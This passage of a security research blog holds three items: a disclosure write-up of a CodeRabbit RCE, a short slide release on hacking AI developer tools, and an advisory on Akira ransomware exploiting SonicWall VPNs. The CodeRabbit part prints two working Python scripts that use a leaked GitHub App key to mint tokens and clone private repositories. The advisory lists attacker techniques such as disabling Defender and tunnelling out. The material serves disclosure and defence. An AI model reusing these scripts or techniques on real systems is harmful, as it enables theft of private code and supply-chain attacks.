Therefore, a malicious person could exploit the vulnerability to leak the CodeRabbit GitHub app private key, list all the installations, list each repository, generate an access token for each repository, and clone private repositories, serve malware from public repositories or manipulate the git history of a repository. This could be used to perform lateral movement and potentially leak GitHub repository secrets of the GitHub repository through GitHub actions if the targeted repository contains vulnerable GitHub actions.

Proof of concept

Here’s an example of how this can be achieved using the PyGitHub Python library, assuming that the private key is stored in a file called priv.pem and that we have the app ID and client ID (also leaked from the environment variables):

#!/usr/bin/env python3  
import json  
import time  
 
import jwt  
import requests  
from github import Auth, GithubIntegration  
 
with open("priv.pem", "r") as f:  
    signing_key = f.read()  
 
app_id = "TODO_insert_app_id_here" 
client_id = "Iv1.TODO_insert_client_id_here" 
 
 
def gen_jwt():  
    payload = {  
        # Issued at time  
        'iat': int(time.time() - 60),  
        # JWT expiration time (10 minutes maximum)  
        'exp': int(time.time()) + 600 - 60,  
        # GitHub App's client ID  
        'iss': client_id  
    }  
 
    # Create JWT  
    encoded_jwt = jwt.encode(payload, signing_key, algorithm="RS256")  
    return encoded_jwt  
 
 
def create_access_token(install_id, jwt):  
    response = requests.post(  
        f"https://api.github.com/app/installations/{install_id}/access_tokens",  
        headers={  
            "Accept": "application/vnd.github+json",  
            "Authorization": f"Bearer {jwt}",  
            "X-GitHub-Api-Version": "2022-11-28",  
        }  
    )  
    j = response.json()  
    access_token = j["token"]  
    return access_token  
 
 
def auth():  
    auth = Auth.AppAuth(app_id, signing_key)  
    gi = GithubIntegration(auth=auth)  
    app = gi.get_app()  
 
    # iterate through app installations, get the first 5  
    for installation in gi.get_installations().reversed[:5]:  
        install_id = installation.id 
 
    # or access an installation by its ID directly  
    installation = gi.get_app_installation(install_id)  
 
    jwt = gen_jwt()  
    create_access_token(install_id, jwt)  
 
    # get all github repositories this installation has access to  
    repos = installation.get_repos()  
    for repo in repos:  
        full_name = repo.full_name  
        stars = repo.stargazers_count  
        html_url = repo.html_url  
        is_private_repo = repo.private  
        clone_url = f"https://x-access-token:{access_token}@github.com/{full_name}.git" 
        print(clone_url)  
 
        # repo can be cloned with "git clone {clone_url}"  
        # access token is valid for 10 minutes, but a new one can be generated whenever needed  
 
if __name__ == "__main__":  
    auth()

Obviously, iterating through the list of all GitHub installations would have required making thousands of requests to the GitHub API on behalf of the production CodeRabbit GitHub app and this may have exceeded the API quota. We didn’t want to risk disrupting the production service so we only iterated through a couple installations to confirm the PoC was working.

Leaking CodeRabbit’s private repositories

We mentioned earlier that we couldn’t confirm the presence of the original source code of the application on the production Docker container. Well, since CodeRabbit eats their own dog food, they run their application on their own GitHub repositories. We can therefore easily retrieve the app installation ID for their GitHub organization and list the repositories this app installation has access to.

This is the list of private repositories the coderabbitai GitHub organization has granted CodeRabbit access to:

  • https://github.com/coderabbitai/****
  • https://github.com/coderabbitai/****************
  • https://github.com/coderabbitai/************
  • https://github.com/coderabbitai/******************
  • https://github.com/coderabbitai/*********
  • https://github.com/coderabbitai/***********
  • https://github.com/coderabbitai/*******
  • https://github.com/coderabbitai/*****************

To go further, one can generate an access token (as explained above) and clone these private repositories.

Here’s the PoC to do this. Note that it’s similar to the above, except that we directly retrieve the app installation for a specific GitHub organization by its name, instead of iterating through all the installations:

#!/usr/bin/env python3  
import time  
 
import jwt  
import requests  
from github import Auth, GithubIntegration  
 
with open("priv.pem", "r") as f:  
    signing_key = f.read()  
 
app_id = "CENSORED" 
client_id = "CENSORED" 
 
 
def gen_jwt():  
    payload = {  
        # Issued at time  
        'iat': int(time.time() - 60),  
        # JWT expiration time (10 minutes maximum)  
        'exp': int(time.time()) + 600 - 60,  
        # GitHub App's client ID  
        'iss': client_id  
    }  
 
    # Create JWT  
    encoded_jwt = jwt.encode(payload, signing_key, algorithm="RS256")  
    return encoded_jwt  
 
 
def auth():  
    auth = Auth.AppAuth(app_id, signing_key)  
    gi = GithubIntegration(auth=auth)  
 
    # Target a specific Github organization that uses CodeRabbit  
    org = "coderabbitai"   
    installation = gi.get_org_installation(org)  
 
    # Target a specific Github user that uses CodeRabbit
    # user = "amietn"  
    # installation = gi.get_user_installation(user)  
 
    print(installation.id)  
    gen_token = True 
 
    if gen_token:  
        jwt = gen_jwt()  
        response = requests.post(  
            f"https://api.github.com/app/installations/{installation.id}/access_tokens",  
            headers={  
                "Accept": "application/vnd.github+json",  
                "Authorization": f"Bearer {jwt}",  
                "X-GitHub-Api-Version": "2022-11-28",  
            }  
        )  
        j = response.json()  
        access_token = j["token"]  
 
    repos = installation.get_repos()  
    print("---repos---")  
    for repo in repos:  
        full_name = repo.full_name  
        html_url = repo.html_url  
        private = repo.private  
        if private:  
            print(f"* {full_name} ({private=}) - {html_url}")  
 
            if gen_token:  
                clone_url = f"https://x-access-token:{access_token}@github.com/{full_name}.git" 
                print(clone_url)  
 
 
if __name__ == "__main__":  
    auth()

In a similar way, a malicious person could target not only a specific GitHub organization but also a specific GitHub personal account that uses CodeRabbit and access their private repositories and/or modify them.

As you can see, one can directly obtain the app installation ID for an organization or a user. So, this way there is no need to iterate through all the GitHub app installations to find a specific GitHub user or organization. Only the organization or user’s name is required.

Impacts summary

Let’s take a moment to summarize the impacts of getting write access to these 1 million repositories. A malicious person could have performed the following operations on affected repositories:

  • Access private GitHub repositories nobody was ever supposed to access. This is a privacy breach.
  • Modify the git history of affected GitHub repositories – Note that this can be a supply chain attack since GitHub repositories are often the source for building software before it’s distributed
  • Modify existing GitHub releases and replace or add malicious downloadable files – Supply chain attack
  • Further lateral moves to potentially leak GitHub repository secrets by exploiting existing vulnerable GitHub actions by pushing git commits – Note that since the CodeRabbit GitHub app doesn’t have write permission to workflows, GitHub actions can’t be directly modified. However, a vulnerable GitHub action may be exploited more easily with write access to the git repository. See the talk I gave at 38C3 for more details on how we found an instance where this was exploitable.

Additionally, we obtained RCE on the CodeRabbit production system. A malicious person could have performed destructive operations, caused a denial of service, or performed malicious operations on third party systems (see list of leaked secrets above).

Context is key

While running the exploit, CodeRabbit would still review our pull request and post a comment on the GitHub PR saying that it detected a critical security risk, yet the application would happily execute our code because it wouldn’t understand that this was actually running on their production system.

CodeRabbit’s code review of the exfiltration PoC PR

Remediation

CodeRabbit supports running dozens of external tools. These tools may get updates and new tools may be supported. Both cases may open the door to new ways of running arbitrary code. Therefore, trying to prevent arbitrary code execution through these tools sounds like an impossible task.

Instead, it would be best to assume that the user may be able to run untrusted code through these tools. So, running them in an isolated environment, with only the minimum information required to run the tools themselves, and not passing them any environment variables would be much better. Even if arbitrary code execution would be possible, the impact would be much less severe.

For defense in depth, one should add a mechanism that prevents sending private information to an attacker-controlled server. For example, only allow outgoing traffic to whitelisted hosts, if possible. If the tool doesn’t require internet access, then all network traffic may even be disabled in that isolated environment. This way it would make it harder for an attacker to exfiltrate secrets.

Responsible disclosure

After responsibly disclosing this critical vulnerability to the CodeRabbit team, we learned from them that they had an isolation mechanism in place, but Rubocop somehow was not running inside it. The CodeRabbit team was extremely responsive and acknowledged receipt of the disclosure the same day. They immediately disabled Rubocop and rotated the secrets and started working on a fix. The next week they told us that the vulnerability had been fixed. Kudos to the CodeRabbit team for responding promptly and fixing the issue.

Here is a summary of the disclosure timeline:

  • January 24, 2025:
    • Disclose vulnerability to CodeRabbit
    • CodeRabbit acknowledges vulnerability and confirms they are working on a fix
  • January 30, 2025:
    • CodeRabbit confirms fix

Conclusions

In the end, we only provided PoCs and didn’t take things further. A patient attacker could have enumerated the available access, identified the highest value targets, and then attacked those targets to distribute malware to countless others in a larger supply chain attack. Security is hard, and a variety of factors can come together to create security issues. Being quick to respond and remediate, as the CodeRabbit team was, is a critical part of addressing vulnerabilities in modern, fast-moving environments. Other vendors we contacted never responded at all, and their products are still vulnerable.

In the race to bring AI-powered products to market, many companies prioritize speed over security. While rapid innovation is exciting, overlooking security can have catastrophic consequences, as we’ve seen. The solution isn’t to stop but to build security into the development process from day one. By making security a core priority, AI companies can create products that are not only groundbreaking but also resilient and responsible. After all, true innovation isn’t just about moving fast. It’s about building something resilient and safe for users.

AI Security
August 7, 2025

Hack To The Future Slides And Content

Nathan Hamiel

Hello everyone. Today, we are releasing the slides from our Black Hat USA presentation Hack To The Future: Owning AI-Powered Tools With Old School Vulns. During our research, we identified vulnerabilities in AI-powered developer productivity tools. These tools extend far beyond AI coding assistants.

We also identified some common trends and themes that we encountered during our research and made some recommendations for organizations when looking for issues in these tools, as well as how to protect themselves.

There was too much content to cover, so the slides have a bonus content section. Also, follow us for more content coming soon.

Please contact us if you have any questions or would like to learn more. Thank you for attending, and enjoy.

Hack to the Future Slides_v1

Download

Research
Security Advisory
Threat Research
Ransomware
August 6, 2025

A Likely Zero-Day Vulnerability in SonicWall SSL-VPN Exploited by Akira Ransomware Group

Kudelski Security Team

Update

SonicWall has clarified that the recent cyber activity affecting Gen 7 firewalls with SSL-VPN enabled is not the result of a zero-day vulnerability, but is instead linked to CVE-2024-40766. This is an improper access control vulnerability first disclosed in August 2024. This flaw affects the SonicOS management interface and SSL-VPN components, and under certain conditions, can lead to unauthorized resource access. The issue was originally addressed in SonicWall advisory SNWLID-2024-0015.
According to SonicWall and corroborating incident response data, many affected deployments involve migrations from Gen 6 to Gen 7 firewalls where local user accounts and passwords were imported without being reset. These legacy credentials, combined with suboptimal configuration hardening, created conditions susceptible to credential-based attacks, including brute-force and MFA bypass attempts.

SonicWall is urging customers who have migrated configurations from Gen 6 appliances to:

  • Upgrade to SonicOS firmware version 7.3.0 or later, which includes enhanced protections against credential attacks
  • Reset all local user account passwords for any users with SSL-VPN access
  • Audit and harden SSL-VPN configurations, especially those exposing local accounts inherited from previous generations

Environments not yet upgraded to SonicOS 7.3 remain more vulnerable, as they lack recent mitigations that improve authentication hardening and brute-force resistance.

Summary

In late July 2025, the Cyber Fusion Center (CFC) observed and investigated multiple incident response engagements involving network intrusions traced to SonicWall SSL-VPN devices, followed shortly by ransomware deployment. These attacks are attributed to the Akira ransomware group, whose affiliates are actively exploiting CVE-2024-40766 in SonicWall’s VPN/firewall appliances. The vulnerability enables attackers to gain initial access even on fully-patched devices and despite multi-factor authentication (MFA), effectively bypassing usual login protections.

Confirmed intrusions have been reported across organizations in North America and Europe. Once the SonicWall device is compromised, the threat actors rapidly pivot to internal networks where they steal credentials, disable security tools, and ultimately execute Akira ransomware to encrypt systems. These findings are based on direct forensic evidence collected and analyzed during active incident response operations led by the CFC across multiple victim environments. No official patch is currently available, and SonicWall has not yet publicly disclosed full technical details. At the moment, the only way to avoid the impact at this time is to disable the SSL-VPN service until a patch is available.

UDPATE: The surge of attacks is linked to CVE-2024-40766.

Affected Systems and Applications

Current evidence indicates that the exploitation is limited to SonicWall Gen 7 firewalls, specifically TZ and NSa-series models, with SSL-VPN enabled.

Confirmed Affected

SonicWall Gen 7 TZ and NSa-series firewalls

  • Firmware versions 7.2.0-7015 and earlier
  • Devices with SSL-VPN services exposed to the internet

All seventh-generation SonicWall firewalls running SonicOS (e.g. TZ and NSa models) with SSL-VPN enabled are at risk. Huntress confirms the suspected vulnerability exists in firmware versions 7.2.0-7015 and earlier. Environments with these devices exposed to the internet for VPN access are the primary targets.

SonicWall SMA

SonicWall SMA series remote access devices (which provide SSL-VPN functionality) have also been implicated in the observed incidents. Both traditional firewalls and SMA VPN appliances are being targeted in similar ways.

Potentially Affected (Under Investigation)

  • Other Gen 7 SonicWall firewalls with SSL-VPN enabled
  • Any configurations exposing the SSL-VPN interface to untrusted networks

There are no current indications that SMA 100-series appliances or Gen 6 models are affected. However, organizations using any SonicWall appliance with SSL-VPN enabled should perform proactive threat hunting and consider disabling VPN exposure until more is known.

Technical Details

The attack begins with a direct compromise of the SonicWall appliance itself. The threat actor gains unauthenticated access to the firewall, bypassing both login and multi-factor authentication (MFA) mechanisms. This provides the adversary with a foothold inside the network perimeter via the exposed VPN service. Indicators strongly suggest a novel flaw: multiple incidents involved fully-patched SonicWall devices being breached and MFA controls rendered ineffective. (While brute-force or stolen credentials were considered, many victims had recently rotated credentials, and some attacks progressed even with MFA, pointing to a sophisticated exploit.) In each case, the attacker gains unauthorized VPN access to the network via the SonicWall appliance as the entry point.

Once access is established, the Akira ransomware group executes a structured, multi-stage operation:

Initial Access

  • Compromise of the SonicWall SSL-VPN appliance: The attacker breaches the SonicWall device via the suspected zero-day, effectively taking control of the appliance or extracting valid VPN session credentials. This provides a foothold on the internal network.

Privilege Escalation via Internal Accounts

  • The threat actors elevate privileges by abusing credentials stored on or used by the SonicWall. In many cases, the firewall had an over-privileged domain account (e.g. an LDAP service account for directory integration) which the attackers hijack. Accounts such as “sonicwall” or “LDAPAdmin” tied to the device were leveraged to gain Domain Admin-level access in the victim environment.

Command and Control & Persistence

  • Deployment of Cloudflared tunnels and OpenSSH giving the attacker persistent C2 access.
  • Installation of RMMs such as AnyDesk, ScreenConneet and SSH.
  • Creation and Configuration of new user accounts.

By installing a Cloudflared tunnel and an SSH backdoor, the threat actors ensure continued clandestine access even if the VPN hole is later closed.

Lateral Movement & Credentials Dumping

  • Use of WMI and Powershell Remoting to move across the network.
  • Enumeration of network topology, assets, and privileges.
  • Dumping and decrypting credentials.

Armed with high privileges, the threat actors expand across the network. They utilize a mix of “living off the land” techniques and custom tools to map out and dominate the environment.

Defense Evasion

  • Disabling security tools prior to ransomware deployment. Techniques include:
  • Set-MpPreference to disable Windows Defender.
  • netsh.exe to disable the firewall or add new firewall rules.

The threat actors methodically disable security tools and logging to avoid detection. They use Windows utilities and commands to impair defenses.

Exfiltration & Ransomware Deployment

In several cases, the attackers prepared data for exfiltration prior to encryption. They were observed compressing files and sensitive data using tools like WinRAR (command-line usage to archive data), and in some instances using FTP tools (e.g., FileZilla’s command-line fzsftp.exe) to export stolen data.

  • Prepare data before exfiltration using compressing tools.
  • Deployment of the Akira ransomware payload.
  • Targeting of backup servers and recovery infrastructure to increase impact.

Mitigation & Recommendations

Update:

To ensure full protection and minimize exposure, the Cyber Fusion Center (CFC) recommends the following immediate actions:

Immediate Actions

  • Update firmware to version 7.3.0, which includes enhanced protections against brute force attacks and additional MFA controls. Further derails are in the Firmware update guide, listed in the References section
  • Reset all local user account passwords for any accounts with SSLVPN access, especially if they were carried over during migration from Gen 6 to Gen 7.
  • Continue applying the previously recommended best practices:
  • Enable Botnet Protection and Geo-IP Filtering.
  • Remove unused or inactive user accounts.
  • Enforce MFA and strong password policies.
  • As an immediate precaution, disable SonicWall SSL-VPN services entirely if your organization can operate without them (until a fix is applied). Where VPN access must remain, limit inbound connectivity to a whitelist of trusted IP ranges (e.g., your employees’ ISP ranges or known partners) so that the SonicWall VPN cannot be accessed by arbitrary internet hosts.

Proactive patches and hardening

  • Monitor SonicWall’s official advisory channels closely for any security updates or hotfixes addressing this issue. SonicWall has stated it will release updated firmware and guidance as soon as a vulnerability is confirmed. Plan to upgrade the SonicOS/SMA firmware immediately once a patch is available.
  • Ensure offline and immutable backups are in place and tested.

Detection and Hunting Measures

  • The CFC strongly recommends enabling verbose logging on SonicWall appliances (VPN, system, and authentication logs) and forwarding all logs to a centralized SIEM to support retrospective analysis and threat hunting, in accordance with the priorities defined in the log collection framework.
  • Use EDR across endpoints to monitor post-compromise activity.

What the Cyber Fusion Center is Doing

The CFC is currently

  • Continuing active threat hunting operations and support engagements in environments impacted by this SonicWall VPN exploitation.
  • Leveraging findings from recent IR cases to refine detection and response capabilities.
  • Monitoring SonicWall’s release of a patch or verified mitigation guidance.

The CFC will continue to monitor the situation and send an advisory update if needed. At the moment, the only way to avoid the impact at this time is to disable the SSL-VPN service until a patch is available.

Indicators of Compromise (IOCs)

Hash | FFED1A30D2CF18FE9278AB9FEEDCC65E7FF3E07DE4208C253C854C3B3E0F4ED0 | Hash of the ransomware executable

Hostname | DESKTOP-ER0LK0E | Artefact hostname they often use

Hostname | DESKTOP-MA79SEI | Artefact hostname they often use

References

